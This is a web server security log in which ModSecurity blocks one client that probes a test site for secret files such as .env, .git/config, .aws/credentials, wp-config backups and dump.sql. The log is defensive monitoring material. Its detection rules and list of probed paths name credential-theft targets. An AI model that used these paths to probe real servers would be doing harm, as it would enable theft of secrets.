[Tue Nov 11 13:02:05.498509 2025] [:error] [pid 4171506] [client 62.60.131.162:57755] [client 62.60.131.162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "aRMlvZgn-n6nGIPCuFVIoQAAAAQ"]
[Tue Nov 11 13:02:05.498848 2025] [:error] [pid 4171506] [client 62.60.131.162:57755] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "aRMlvZgn-n6nGIPCuFVIoQAAAAQ"]
[Tue Nov 11 13:02:05.499030 2025] [:error] [pid 4171506] [client 62.60.131.162:57755] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "aRMlvZgn-n6nGIPCuFVIoQAAAAQ"]
[Tue Nov 11 13:02:05.594672 2025] [:error] [pid 4182223] [client 62.60.131.162:57100] [client 62.60.131.162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aRMlvfLIaLFksBGXnMUwlQAAAAI"]
[Tue Nov 11 13:02:05.594810 2025] [:error] [pid 4182223] [client 62.60.131.162:57100] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aRMlvfLIaLFksBGXnMUwlQAAAAI"]
[Tue Nov 11 13:02:05.595015 2025] [:error] [pid 4182223] [client 62.60.131.162:57100] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aRMlvfLIaLFksBGXnMUwlQAAAAI"]
[Tue Nov 11 13:02:05.595181 2025] [:error] [pid 4182223] [client 62.60.131.162:57100] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aRMlvfLIaLFksBGXnMUwlQAAAAI"]
[Tue Nov 11 13:02:05.651556 2025] [:error] [pid 4182223] [client 62.60.131.162:57320] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /.ssh/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/sftp-config.json"] [unique_id "aRMlvfLIaLFksBGXnMUwlgAAAAI"]
[Tue Nov 11 13:02:05.651789 2025] [:error] [pid 4182223] [client 62.60.131.162:57320] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/sftp-config.json"] [unique_id "aRMlvfLIaLFksBGXnMUwlgAAAAI"]
[Tue Nov 11 13:02:05.651974 2025] [:error] [pid 4182223] [client 62.60.131.162:57320] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/sftp-config.json"] [unique_id "aRMlvfLIaLFksBGXnMUwlgAAAAI"]
[Tue Nov 11 13:02:05.720904 2025] [:error] [pid 4182223] [client 62.60.131.162:57425] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aRMlvfLIaLFksBGXnMUwlwAAAAI"]
[Tue Nov 11 13:02:05.721113 2025] [:error] [pid 4182223] [client 62.60.131.162:57425] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aRMlvfLIaLFksBGXnMUwlwAAAAI"]
[Tue Nov 11 13:02:05.721271 2025] [:error] [pid 4182223] [client 62.60.131.162:57425] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aRMlvfLIaLFksBGXnMUwlwAAAAI"]
[Tue Nov 11 13:02:06.464503 2025] [:error] [pid 4182255] [client 62.60.131.162:57516] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /prevlaravel/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aRMlvgZm8yrJP0-Ep0G2RwAAACQ"]
[Tue Nov 11 13:02:06.464756 2025] [:error] [pid 4182255] [client 62.60.131.162:57516] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aRMlvgZm8yrJP0-Ep0G2RwAAACQ"]
[Tue Nov 11 13:02:06.464937 2025] [:error] [pid 4182255] [client 62.60.131.162:57516] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aRMlvgZm8yrJP0-Ep0G2RwAAACQ"]
[Tue Nov 11 19:36:07.837227 2025] [:error] [pid 4188380] [client 62.60.131.162:56449] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCF2fQcyDFa8_PP3KMIwAAAAs"]
[Tue Nov 11 19:36:07.837521 2025] [:error] [pid 4188380] [client 62.60.131.162:56449] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCF2fQcyDFa8_PP3KMIwAAAAs"]
[Tue Nov 11 19:36:07.850583 2025] [:error] [pid 4188380] [client 62.60.131.162:56449] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCF2fQcyDFa8_PP3KMIwAAAAs"]
[Tue Nov 11 19:36:07.951013 2025] [:error] [pid 4182328] [client 62.60.131.162:56934] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aROCF0ItK4BSfhICLlAd2wAAAGs"]
[Tue Nov 11 19:36:07.951243 2025] [:error] [pid 4182328] [client 62.60.131.162:56934] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aROCF0ItK4BSfhICLlAd2wAAAGs"]
[Tue Nov 11 19:36:07.951410 2025] [:error] [pid 4182328] [client 62.60.131.162:56934] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aROCF0ItK4BSfhICLlAd2wAAAGs"]
[Tue Nov 11 19:36:18.557712 2025] [:error] [pid 4188405] [client 62.60.131.162:54471] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aROCIpHln84j_KHItEhYMgAAABo"]
[Tue Nov 11 19:36:18.557998 2025] [:error] [pid 4188405] [client 62.60.131.162:54471] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aROCIpHln84j_KHItEhYMgAAABo"]
[Tue Nov 11 19:36:18.558176 2025] [:error] [pid 4188405] [client 62.60.131.162:54471] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aROCIpHln84j_KHItEhYMgAAABo"]
[Tue Nov 11 19:36:18.800359 2025] [:error] [pid 4188460] [client 62.60.131.162:56912] [client 62.60.131.162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aROCIinn5xsa00JYmcmZ6gAAAEA"]
[Tue Nov 11 19:36:18.800638 2025] [:error] [pid 4188460] [client 62.60.131.162:56912] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aROCIinn5xsa00JYmcmZ6gAAAEA"]
[Tue Nov 11 19:36:18.800919 2025] [:error] [pid 4188460] [client 62.60.131.162:56912] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aROCIinn5xsa00JYmcmZ6gAAAEA"]
[Tue Nov 11 19:36:18.801126 2025] [:error] [pid 4188460] [client 62.60.131.162:56912] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aROCIinn5xsa00JYmcmZ6gAAAEA"]
[Tue Nov 11 19:36:19.382410 2025] [authz_core:error] [pid 4188402] [client 62.60.131.162:54910] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Tue Nov 11 19:36:19.392838 2025] [:error] [pid 4188459] [client 62.60.131.162:55500] [client 62.60.131.162] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aROCI2ZlcocAJzGhwdOdqwAAAD8"]
[Tue Nov 11 19:36:19.393129 2025] [:error] [pid 4188459] [client 62.60.131.162:55500] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aROCI2ZlcocAJzGhwdOdqwAAAD8"]
[Tue Nov 11 19:36:19.393297 2025] [:error] [pid 4188459] [client 62.60.131.162:55500] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aROCI2ZlcocAJzGhwdOdqwAAAD8"]
[Tue Nov 11 19:36:19.401530 2025] [:error] [pid 4188461] [client 62.60.131.162:51592] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCI7u5uNjT_B-Jt13GAQAAAEE"]
[Tue Nov 11 19:36:19.401797 2025] [:error] [pid 4188461] [client 62.60.131.162:51592] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCI7u5uNjT_B-Jt13GAQAAAEE"]
[Tue Nov 11 19:36:19.401995 2025] [:error] [pid 4188461] [client 62.60.131.162:51592] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aROCI7u5uNjT_B-Jt13GAQAAAEE"]
[Tue Nov 11 19:36:19.449890 2025] [:error] [pid 4188409] [client 62.60.131.162:50900] [client 62.60.131.162] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aROCI6Agmgp3OElyveQq-AAAAB4"]
